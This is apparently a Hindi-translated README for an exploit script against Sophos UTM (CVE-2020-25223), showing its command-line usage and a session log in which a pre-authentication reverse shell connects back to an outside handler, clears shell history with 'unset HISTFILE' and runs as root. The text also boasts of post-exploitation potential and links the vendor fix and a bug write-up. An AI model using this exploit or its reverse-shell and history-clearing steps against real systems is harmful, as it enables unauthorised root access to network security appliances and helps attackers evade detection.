
CVE-2020-25223
CVE-2020-25223 RCE PoC, रिवर्स शेल प्राप्त करता है। प्री-ऑथ। इसे जल्दी से लागू किया गया क्योंकि कुछ खतरे वाले मैग्नेट को एकीकृत करने की आवश्यकता थी।
# python sophucked.py https://x.x.x.x:4443 x.x.x.x 80
(+) starting handler on port 80
(+) Sending callback to x.x.x.x:80
(+) connection from x.x.x.x
(+) pop thy shell!
bash: no job control in this shell
utm:/var/confd # unset HISTFILE
unset HISTFILE
utm:/var/confd # id
id
uid=0(root) gid=0(root) groups=0(root)
utm:/var/confd # exit
exit
exit
*** Connection closed by remote host ***
#
इसमें लागू नहीं किया गया है, बस nuclei टेम्पलेट का उपयोग करें।
इनमें एक पायथन इंटरप्रेटर है, और वास्तव में एक बहुत ही पूर्ण विशेषताओं वाला लिनक्स वातावरण उपलब्ध है। पोस्ट-एक्सप्लॉइटेशन के लिए अद्भुत क्षमता।
मुझे यकीन है कि कोई परवाह करने वाला व्यक्ति इसे भर सकता है। Bitter ('ब्लू टीम ट्विटर' का एक उपसमूह) शायद जल्द ही ऐसा करेगा। मेरा मतलब है, यह पता लगाना इतना मुश्किल नहीं हो सकता कि आपके Unified Threat Manager बॉक्स से एक अनएन्क्रिप्टेड रिवर्स शेल बीकनिंग आउट कर रहा है, है ना?
किसी (संभवतः Sophos से) ने यह भेजा है, यह आधिकारिक फिक्स लिंक है। अपने UTM को अपडेट करें। https://www.sophos.com/en-us/security-advisories/sophos-sa-20200918-sg-webadmin-rce
तृतीय पक्ष संदर्भ (बग विवरण): https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223
सीधे Sophos से शिकायत करें, जिन्होंने किसी तरह 21वीं सदी में Perl में open() में उपयोगकर्ता इनपुट पास करना एक अच्छा विचार समझा।